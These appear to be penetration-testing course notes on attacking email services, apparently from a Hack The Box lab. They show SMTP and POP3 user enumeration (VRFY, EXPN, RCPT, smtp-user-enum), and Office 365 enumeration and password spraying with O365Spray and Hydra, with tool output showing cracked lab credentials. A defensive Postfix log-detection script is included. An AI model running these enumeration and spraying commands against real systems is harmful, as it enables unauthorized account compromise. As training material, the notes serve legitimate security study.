SMTP is used for sending and receiving (transferring) emails. POP3 or IMAP4 is used to download emails into our email application.
Interaction
telnet ip-addr 110
USER username@domain.com
PASS password123
list
retr 1
Enumeration
We can use the Mail eXchanger (MX) DNS record to identify a domain's mail server.
Host
jadu101@htb[/htb]$ host -t MX hackthebox.eu
hackthebox.eu mail is handled by 1 aspmx.l.google.com.
jadu101@htb[/htb]$ host -t A mail1.inlanefreight.htb.
mail1.inlanefreight.htb has address 10.129.14.128
dig
jadu101@htb[/htb]$ dig mx inlanefreight.com | grep "MX" | grep -v ";"
inlanefreight.com. 300 IN MX 10 mail1.inlanefreight.com.
Identify Users - 25
VRFY
jadu101@htb[/htb]$ telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
VRFY root
252 2.0.0 root
EXPN
EXPN is similar to VRFY, but when it is used with a distribution list, it lists all users on that list.
jadu101@htb[/htb]$ telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
EXPN john
250 2.1.0 john@inlanefreight.htb
EXPN support-team
250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb
RCPT
jadu101@htb[/htb]$ telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
MAIL FROM:test@htb.com
250 2.1.0 test@htb.com... Sender ok
RCPT TO:julio
550 5.1.1 julio... User unknown
RCPT TO:john
250 2.1.5 john... Recipient ok
Identify Users - 110
We can use the POP3 protocol to enumerate users as well.
USER
jadu101@htb[/htb]$ telnet 10.10.110.20 110
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
+OK POP3 Server ready
USER julio
-ERR
USER john
+OK
smtp-user-enum
A good tool, but it is buggy on my Kali Linux, so I would rather use msfconsole with auxiliary/scanner/smtp/smtp_enum.
jadu101@htb[/htb]$ smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... userlist.txt
Target count ............. 1
Username count ........... 78
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb
######## Scan started at Thu Apr 21 06:53:07 2022 #########
10.129.203.7: jose@inlanefreight.htb exists
10.129.203.7: pedro@inlanefreight.htb exists
10.129.203.7: kate@inlanefreight.htb exists
######## Scan completed at Thu Apr 21 06:53:18 2022 #########
3 results.
78 queries in 11 seconds (7.1 queries / sec)
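The VRFY, EXPN, and RCPT probing above, and tools such as smtp-user-enum that automate it, leave a distinctive trail on the server side: one client address producing a burst of "User unknown" rejections for many different recipients within a few seconds. The following is an added example for these notes (not code from the notes, from Postfix, or from any tool mentioned here) that parses Postfix-style smtpd reject lines and flags such bursts. The log lines are constructed for the example, and the window and threshold values are assumptions to tune per environment.

```python
"""Flag SMTP recipient enumeration (VRFY/EXPN/RCPT probing) in Postfix smtpd logs.

Added example for these notes, not code from the notes or from any tool they
mention. Log lines are constructed; WINDOW and MIN_DISTINCT are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one client probes five recipients in four seconds, then a
# partner MTA mistypes a single address a quarter of an hour later (benign).
SAMPLE_LOG = """\
Apr 21 06:53:07 parrot postfix/smtpd[2201]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <admin@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<admin@inlanefreight.htb> proto=ESMTP helo=<x>
Apr 21 06:53:07 parrot postfix/smtpd[2201]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <julio@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<julio@inlanefreight.htb> proto=ESMTP helo=<x>
Apr 21 06:53:08 parrot postfix/smtpd[2201]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <bob@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<bob@inlanefreight.htb> proto=ESMTP helo=<x>
Apr 21 06:53:09 parrot postfix/smtpd[2201]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <alice@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<alice@inlanefreight.htb> proto=ESMTP helo=<x>
Apr 21 06:53:10 parrot postfix/smtpd[2201]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <dave@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<dave@inlanefreight.htb> proto=ESMTP helo=<x>
Apr 21 06:53:11 parrot postfix/smtpd[2201]: disconnect from unknown[10.10.14.5] ehlo=1 mail=1 rcpt=0/5 quit=1 commands=3/8
Apr 21 07:10:02 parrot postfix/smtpd[2305]: NOQUEUE: reject: RCPT from mail.partner.example[203.0.113.9]: 550 5.1.1 <jsmith@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<info@partner.example> to=<jsmith@inlanefreight.htb> proto=ESMTP helo=<mail.partner.example>
"""

WINDOW = timedelta(seconds=60)  # assumption: enumeration tools probe quickly
MIN_DISTINCT = 4                # assumption: legitimate senders rarely mistype 4 addresses

# Matches Postfix's "Recipient address rejected: User unknown" reject line.
REJECT_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: "
    r"NOQUEUE: reject: RCPT from \S+\[(?P<ip>[\d.]+)\]: 550 5\.1\.1 "
    r"<(?P<rcpt>[^>]+)>: Recipient address rejected: User unknown"
)


def parse_rejects(log_text, year=2022):
    """Extract (timestamp, client_ip, recipient) from 'User unknown' reject lines.

    Syslog timestamps carry no year, so the caller supplies it.
    """
    events = []
    for line in log_text.splitlines():
        m = REJECT_RE.match(line)
        if not m:
            continue  # connects, disconnects and accepted mail are not enumeration signals
        stamp = " ".join(m["ts"].split())  # collapse the double space of single-digit days
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["rcpt"].lower()))
    return events


def detect_enumeration(events, window=WINDOW, min_distinct=MIN_DISTINCT):
    """Return an alert per client IP that probed at least min_distinct different
    unknown recipients within any window-long span (sliding window over that
    client's rejects). Each alert carries the count, first/last time and names."""
    by_ip = defaultdict(list)
    for ts, ip, rcpt in events:
        by_ip[ip].append((ts, rcpt))
    alerts = {}
    for ip, rejects in by_ip.items():
        rejects.sort()
        best = None
        for i, (start, _) in enumerate(rejects):
            span = [(t, r) for t, r in rejects[i:] if t - start <= window]
            distinct = sorted({r for _, r in span})
            if len(distinct) >= min_distinct and (
                best is None or len(distinct) > best["distinct_unknown"]
            ):
                best = {"distinct_unknown": len(distinct), "first": start,
                        "last": span[-1][0], "recipients": distinct}
        if best:
            alerts[ip] = best
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_enumeration(parse_rejects(SAMPLE_LOG)).items():
        print(f"{ip}: {alert['distinct_unknown']} unknown recipients between "
              f"{alert['first']:%H:%M:%S} and {alert['last']:%H:%M:%S}: "
              f"{', '.join(alert['recipients'])}")
```

Only the probing client trips the rule; the partner MTA's single typo does not. Postfix's `disable_vrfy_command = yes` setting turns off VRFY outright, but RCPT-based probing cannot be switched off the same way, which is why log-based detection of this burst pattern is worth keeping.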
Cloud Enumeration
O365Spray can be used for username enumeration and password spraying against Microsoft Office 365.
O365 Spray
Let's first validate whether the target domain is using Office 365:
jadu101@htb[/htb]$ python3 o365spray.py --validate --domain msplaintext.xyz
*** O365 Spray ***
>----------------------------------------<
> version : 2.0.4
> domain : msplaintext.xyz
> validate : True
> timeout : 25 seconds
> start : 2022-04-13 09:46:40
>----------------------------------------<
[2022-04-13 09:46:40,344] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-13 09:46:40,743] INFO : [VALID] The following domain is using O365: msplaintext.xyz
Now we identify usernames:
jadu101@htb[/htb]$ python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz
*** O365 Spray ***
>----------------------------------------<
> version : 2.0.4
> domain : msplaintext.xyz
> enum : True
> userfile : users.txt
> enum_module : office
> rate : 10 threads
> timeout : 25 seconds
> start : 2022-04-13 09:48:03
>----------------------------------------<
[2022-04-13 09:48:03,621] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-13 09:48:04,062] INFO : [VALID] The following domain is using O365: msplaintext.xyz
[2022-04-13 09:48:04,064] INFO : Running user enumeration against 67 potential users
[2022-04-13 09:48:08,244] INFO : [VALID] lewen@msplaintext.xyz
[2022-04-13 09:48:10,415] INFO : [VALID] juurena@msplaintext.xyz
[2022-04-13 09:48:10,415] INFO :
[ * ] Valid accounts can be found at: '/opt/o365spray/enum/enum_valid_accounts.2204130948.txt'
[ * ] All enumerated accounts can be found at: '/opt/o365spray/enum/enum_tested_accounts.2204130948.txt'
[2022-04-13 09:48:10,416] INFO : Valid Accounts: 2
Password Attacks
We can use Hydra to password-spray or brute-force email services such as SMTP, POP3, and IMAP4.
Hydra
jadu101@htb[/htb]$ hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-13 11:37:46
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 67 login tries (l:67/p:1), ~5 tries per task
[DATA] attacking pop3://10.10.110.20:110/
[110][pop3] host: 10.129.42.197 login: john password: Company01!
1 of 1 target successfully completed, 1 valid password found
O365 Spray
We can use tools such as O365 Spray for password spraying against cloud services.
jadu101@htb[/htb]$ python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
*** O365 Spray ***
>----------------------------------------<
> version : 2.0.4
> domain : msplaintext.xyz
> spray : True
> password : March2022!
> userfile : usersfound.txt
> count : 1 passwords/spray
> lockout : 1.0 minutes
> spray_module : oauth2
> rate : 10 threads
> safe : 10 locked accounts
> timeout : 25 seconds
> start : 2022-04-14 12:26:31
>----------------------------------------<
[2022-04-14 12:26:31,757] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-14 12:26:32,201] INFO : [VALID] The following domain is using O365: msplaintext.xyz
[2022-04-14 12:26:32,202] INFO : Running password spray against 2 users.
[2022-04-14 12:26:32,202] INFO : Password spraying the following passwords: ['March2022!']
[2022-04-14 12:26:33,025] INFO : [VALID] lewen@msplaintext.xyz:March2022!
[2022-04-14 12:26:33,048] INFO :
[ * ] Writing valid credentials to: '/opt/o365spray/spray/spray_valid_credentials.2204141226.txt'
[ * ] All sprayed credentials can be found at: '/opt/o365spray/spray/spray_tested_credentials.2204141226.txt'
[2022-04-14 12:26:33,048] INFO : Valid Credentials: 1